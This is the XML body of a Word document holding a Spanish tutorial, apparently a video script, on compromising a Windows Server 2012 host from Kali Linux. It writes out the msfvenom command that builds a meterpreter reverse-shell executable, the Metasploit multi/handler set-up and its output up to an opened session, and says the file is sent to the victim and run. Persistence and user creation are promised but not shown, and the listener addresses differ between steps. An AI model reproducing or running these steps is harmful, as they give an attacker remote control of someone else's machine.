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F0" w:rsidRDefault="00C813F0" w:rsidP="00C813F0">
      <w:r>
        <w:t xml:space="preserve">HOLA EN ESTE VIDEO VAMOS A REALIZAR UN ATAQUE A UN SERVIDOR WINDOWS SERVER 2012, UTILIZAREMOS KALI LINUX COMO MAQUINA DE ATAQUE Y EL WINDOWS SERVER COMO VICTIMA, EL ATAQUE LO VAMOS A REALIZAR CON UN PAYLOAD GENERADO DESDE KALI Y POSTERIORMENTE, VAMOS A EJECUTAR METASPLOIT PARA DEJAR A LA ESCUCHA LA CARGA REALIZADA LLAMADA MEGA-2020.EXE. LUEGO DE REALIZAR EL ATAQUE VAMOS A UTILIZAR VARIOS COMANDOS PARA GENERAR ALGO DE RUIDO EN LA VICTIMA, CREAREMOS UNA CARGA PERSISTENTE PARA QUE LA VICTIMA SE CONECTE A NUESTRO ATACANTE KALI CADA  DETERMINADO TIEMPO. TAMBIEN VEREMOS LOS PRIVILEGIOS, CREAREMOS USUARIOS Y OTRAS COSITAS MAS. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C813F0" w:rsidRDefault="00C813F0" w:rsidP="00C813F0"/>
    <w:p w:rsidR="00C813F0" w:rsidRDefault="00C813F0" w:rsidP="00C813F0">
      <w:r>
        <w:t>PASO-</w:t>
      </w:r>
      <w:r>
        <w:t>1:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CREAR LA CARGA UTIL CON MSFVENOM</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C813F0" w:rsidRDefault="00C813F0" w:rsidP="00C813F0"/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root@computaxion:~/Desktop# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.128 LPORT=4444 --platform windows -f exe &gt; /root/Desktop/mega.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C813F0" w:rsidRPr="00C813F0" w:rsidRDefault="00C813F0" w:rsidP="00C813F0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C813F0" w:rsidRDefault="00C813F0" w:rsidP="00C813F0">
      <w:r>
        <w:t>PASO-2: ACTIVAR LOS SERVICIOS POSTGRESQL Y APACHE2</w:t>
      </w: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root@computaxion:~# service postgresql start</w:t>
      </w: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root@computaxion:~# service apache2 start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C813F0" w:rsidRDefault="00C813F0" w:rsidP="00C813F0">
      <w:r>
        <w:t>PASO-3</w:t>
      </w:r>
      <w:r>
        <w:t>: PONER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EN MARCHA METASPLOIT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C813F0" w:rsidRDefault="00C813F0" w:rsidP="00C813F0">
      <w:r>
        <w:t xml:space="preserve">root@computaxion:~# msfconsole </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C813F0" w:rsidRDefault="00C813F0" w:rsidP="00C813F0"/>
    <w:p w:rsidR="00C813F0" w:rsidRDefault="00C813F0" w:rsidP="00C813F0">
      <w:r>
        <w:t xml:space="preserve">    PASO-4: USAR EL HANDLER PARA PONERLO A LA ESCUCHA DEL PAYLOAD CREADO ANTERIORMENTE Y CONFUGURAMOS LOS MISMOS PARAMETROS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C813F0" w:rsidRDefault="00C813F0" w:rsidP="00C813F0">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w: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msf5 &gt; use multi/handler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Msf5</w:t>
      </w:r>
      <w:r w:rsidRPr="00C813F0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C813F0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exploit (</w:t>
      </w:r>
      <w:r w:rsidRPr="00C813F0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>multi/handler) &gt; set PAYLOAD windows/meterpreter/reverse_tcp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PAYLOAD =&gt; windows/meterpreter/reverse_tcp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Msf5</w:t>
      </w:r>
      <w:r w:rsidRPr="00C813F0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C813F0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exploit (</w:t>
      </w:r>
      <w:r w:rsidRPr="00C813F0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>multi/handler) &gt; set LHOST 192.168.0.128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LHOST =&gt; 192.168.0.128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Msf5</w:t>
      </w:r>
      <w:r w:rsidRPr="00C813F0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C813F0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exploit (</w:t>
      </w:r>
      <w:r w:rsidRPr="00C813F0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">multi/handler) &gt; options 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Module options (exploit/multi/handler):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 xml:space="preserve">   Name  Current Setting  Required  Description</w:t>
      </w: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 xml:space="preserve">   ----  ---------------  --------  -----------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Payload options (windows/meterpreter/reverse_tcp):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 xml:space="preserve">   Name      Current Setting  Required  Description</w:t>
      </w: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 xml:space="preserve">   ----      ---------------  --------  -----------</w:t>
      </w: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 xml:space="preserve">   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)</w:t>
      </w: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 xml:space="preserve">   LHOST     192.168.0.118   yes       The listen address (an interface may be specified)</w:t>
      </w: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 xml:space="preserve">   LPORT     4444             yes       The listen port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Exploit target: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 xml:space="preserve">   Id  Name</w:t>
      </w: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 xml:space="preserve">   --  ----</w:t>
      </w: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 xml:space="preserve">   0   Wildcard Target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msf5 exploit(multi/handler) &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C813F0" w:rsidRPr="00C813F0" w:rsidRDefault="00C813F0" w:rsidP="00C813F0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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 xml:space="preserve">[*] Started reverse TCP handler on 192.168.0.118:4444 </w:t>
      </w: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[*] Sending stage (180291 bytes) to 192.168.0.175</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C813F0" w:rsidRPr="00C813F0" w:rsidRDefault="00C813F0" w:rsidP="00C813F0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C813F0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[*] Meterpreter session 1 opened (192.168.0.11684444 -&gt; 192.168.0.175:49294) at 2019-11-28 23:36:13 -0300</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C813F0" w:rsidRPr="00C813F0" w:rsidRDefault="00C813F0" w:rsidP="00C813F0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006509F6" w:rsidRDefault="00C813F0" w:rsidP="00C813F0">
      <w:r>
        <w:t>Le</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> enviamos el archivo a la </w:t>
      </w:r>
      <w:r>
        <w:t>víctima y lo ejecutamos</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00650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F0"/>
    <w:rsid w:val="006509F6"/>
    <w:rsid w:val="00C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57F92-5204-437C-B0F7-94FB2D8B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2019-12-06T22:18:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-12-06T22:21:00Z</dcterms:modified>
</cp:coreProperties>
</file>